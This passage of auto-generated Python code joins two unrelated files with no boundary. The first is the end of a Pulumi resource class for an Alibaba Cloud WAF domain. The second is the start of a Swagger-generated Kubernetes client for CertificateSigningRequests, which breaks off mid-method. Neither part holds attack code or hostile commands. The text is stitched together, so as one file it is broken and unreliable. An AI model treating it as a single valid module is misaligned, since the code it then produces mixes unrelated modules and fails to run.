:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["connection_time"] = connection_time
if domain is not None and not opts.urn:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
__props__.__dict__["domain"] = domain
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["http2_ports"] = http2_ports
__props__.__dict__["http_ports"] = http_ports
__props__.__dict__["http_to_user_ip"] = http_to_user_ip
__props__.__dict__["https_ports"] = https_ports
__props__.__dict__["https_redirect"] = https_redirect
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
if is_access_product is None and not opts.urn:
raise TypeError("Missing required property 'is_access_product'")
__props__.__dict__["is_access_product"] = is_access_product
__props__.__dict__["load_balancing"] = load_balancing
__props__.__dict__["log_headers"] = log_headers
__props__.__dict__["read_time"] = read_time
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["source_ips"] = source_ips
__props__.__dict__["write_time"] = write_time
__props__.__dict__["cname"] = None
super(Domain, __self__).__init__(
'alicloud:waf/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
cname: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Defaults to `PhysicalCluster`.
:param pulumi.Input[str] cname: The CNAME record assigned by the WAF instance to the specified domain.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]] log_headers: The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of IP addresses or domains of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The write timeout of a WAF exclusive cluster. Unit: seconds.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["cname"] = cname
__props__.__dict__["connection_time"] = connection_time
__props__.__dict__["domain"] = domain
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["http2_ports"] = http2_ports
__props__.__dict__["http_ports"] = http_ports
__props__.__dict__["http_to_user_ip"] = http_to_user_ip
__props__.__dict__["https_ports"] = https_ports
__props__.__dict__["https_redirect"] = https_redirect
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["is_access_product"] = is_access_product
__props__.__dict__["load_balancing"] = load_balancing
__props__.__dict__["log_headers"] = log_headers
__props__.__dict__["read_time"] = read_time
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["source_ips"] = source_ips
__props__.__dict__["write_time"] = write_time
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Defaults to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@property
@pulumi.getter
def cname(self) -> pulumi.Output[str]:
"""
The CNAME record assigned by the WAF instance to the specified domain.
"""
return pulumi.get(self, "cname")
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> pulumi.Output[Optional[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Output[str]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> pulumi.Output[Optional[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> pulumi.Output[Optional[str]]:
"""
Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "https_redirect")
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> pulumi.Output[str]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "is_access_product")
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> pulumi.Output[Optional[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> pulumi.Output[Optional[Sequence['outputs.DomainLogHeader']]]:
"""
The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
"""
return pulumi.get(self, "log_headers")
@property
@pulumi.getter(name="readTime")
def read_time(self) -> pulumi.Output[Optional[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the IP addresses or domains of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> pulumi.Output[Optional[int]]:
"""
The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
return pulumi.get(self, "write_time")
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: unversioned
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CertificatesV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_certificates_v1alpha1_certificate_signing_request(self, body, **kwargs):
"""
create a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_certificates_v1alpha1_certificate_signing_request(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, **kwargs)
else:
(data) = self.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, **kwargs)
return data
def create_certificates_v1alpha1_certificate_signing_request_with_http_info(self, body, **kwargs):
"""
create a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
delete a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def delete_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
delete a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_certificates_v1alpha1_collection_certificate_signing_request(self, **kwargs):
"""
delete collection of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_collection_certificate_signing_request(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(**kwargs)
else:
(data) = self.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(**kwargs)
return data
def delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(self, **kwargs):
"""
delete collection of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_certificates_v1alpha1_collection_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def get_certificates_v1alpha1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_certificates_v1alpha1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_certificates_v1alpha1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_certificates_v1alpha1_api_resources_with_http_info(**kwargs)
return data
def get_certificates_v1alpha1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_certificates_v1alpha1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_certificates_v1alpha1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_certificates_v1alpha1_certificate_signing_request(self, **kwargs):
"""
list or watch objects of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_certificates_v1alpha1_certificate_signing_request(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1CertificateSigningRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_certificates_v1alpha1_certificate_signing_request_with_http_info(**kwargs)
else:
(data) = self.list_certificates_v1alpha1_certificate_signing_request_with_http_info(**kwargs)
return data
def list_certificates_v1alpha1_certificate_signing_request_with_http_info(self, **kwargs):
"""
list or watch objects of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_certificates_v1alpha1_certificate_signing_request_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1CertificateSigningRequestList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequestList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
partially update the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def patch_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
partially update the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
